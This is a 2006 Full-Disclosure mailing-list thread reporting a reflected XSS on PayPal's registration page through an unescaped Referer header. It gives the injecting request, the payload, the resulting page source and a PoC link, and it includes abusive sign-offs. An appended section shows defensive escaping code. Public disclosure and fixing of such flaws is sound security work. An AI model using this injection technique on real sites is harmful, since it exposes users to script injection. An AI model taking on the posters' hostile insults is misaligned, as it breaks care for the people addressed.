Date: Tue, 8 Aug 2006 15:51:35 +0200
From: "Thomas Pollet" <thomas.pollet@...il.com>
To: penetrator@...e.in.th
Cc: full-disclosure@...ts.grok.org.uk
Subject: paypal.com xss (was Re: micosoft.com xss)
Man you suck, codes or stfu.
I know the code is broken in more than 1 place; I tried registering event
handlers, exiting jscript etc. etc. Time to move on....
Point is, xss is everywhere, trust no one etc. etc.
To make my point clear... last of the xss@...pal...
GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer:
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="
results in
....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling="20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>
In other words.... the Referer URL isn't correctly cleaned for the paypal
registration page and is used for a js var.
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");s.r="
and click on the sign up link
Have a nice life, die soon,
Thomas
On 08/08/06, Mad World <penetrator@...e.in.th> wrote:
>
> Good morning !
>
> You can doubt, it's your right to do so.
> Wanna bet ?
> Just open your eyes and your nose will show you that you are actually
> breaking silly structure of page in more than one place ..
> It's relatively easy using the same exact place of code you tried to make
> it.
> I have working example, it is based on other microsoft "features" as well.
>
> Greets,
> - Mad World
>
> --- thomas.pollet@...il.com wrote:
>
> From: "Thomas Pollet" <thomas.pollet@...il.com>
> To: penetrator@...e.in.th
> Cc: full-disclosure@...ts.grok.org.uk
> Subject: Re: [Full-disclosure] Re: micosoft.com xss
> Date: Tue, 8 Aug 2006 10:18:56 +0200
>
> On 08/08/06, Mad World <penetrator@...e.in.th> wrote:
>
> Why do you need it ?
> You already discovered xss, the rest of "job" is just matter
> of technique.
> I think majority of xss submitters here could do it by
> various means.
> M$ is lost in its own complexity of how to do simple things.
> If you could ever give me reasonable answer for why do you
> need this $hit - I could give you the "rest", like others
> could.
>
> I doubt you actually tried getting js executed on page load
> (for some reason they try to prevent xss in a number of ways).
> I did try and didn't succeed, that's why I ask.
> Greets,
> Thomas
>
>
>
> _____________________________________________________________
> Visit Thailand @ http://www.sawadee.com
> Websearch and email: DNSASIA.com .... FAST!
> 128k dialup: login.samuinet.com
>
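As an added example (not code from the post or from PayPal), the two renderers below contrast the raw-concatenation pattern visible in the SiteCatalyst block above with a hardened rendering that JSON-encodes the header value and escapes the characters that could still close the script element; `jsStringLiteral`, `countUnescapedQuotes` and the `REFERER_FROM_POST` sample are assumptions of this example, the sample value itself being the PoC string quoted in the post.

```javascript
// Added example: safely embedding an untrusted header value (here the Referer)
// in a string literal inside an inline <script>. Assumed helpers, not PayPal code.

// Encode a value for a JS string literal that lives inside HTML. JSON.stringify
// escapes quotes and backslashes; the extra replacements keep "</script>" and
// "<!--" from being seen by the HTML parser and neutralise U+2028/U+2029, which
// older engines treat as line terminators inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Mirrors the pattern in the post: the header is dropped straight into the quotes.
function renderVulnerable(referer) {
  return 's.r="' + referer + '";';
}

// Hardened: whatever the header contains can only ever be the literal's contents.
function renderHardened(referer) {
  return 's.r=' + jsStringLiteral(referer) + ';';
}

// Check used below: count double quotes that are not preceded by a backslash.
// A single assignment should contain exactly two; more means the value broke out.
function countUnescapedQuotes(line) {
  let count = 0;
  for (let i = 0; i < line.length; i++) {
    if (line[i] === '\\') { i++; continue; } // skip the escaped character
    if (line[i] === '"') count++;
  }
  return count;
}

// Constructed sample: the PoC Referer quoted in the post.
const REFERER_FROM_POST =
  'https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");s.r="';

console.log(renderVulnerable(REFERER_FROM_POST)); // 6 unescaped quotes: three statements
console.log(renderHardened(REFERER_FROM_POST));   // 2 unescaped quotes: one assignment
```

The hardened literal round-trips through `JSON.parse`, so the analytics code still receives the exact header value; only the ability to terminate the literal is gone.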
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/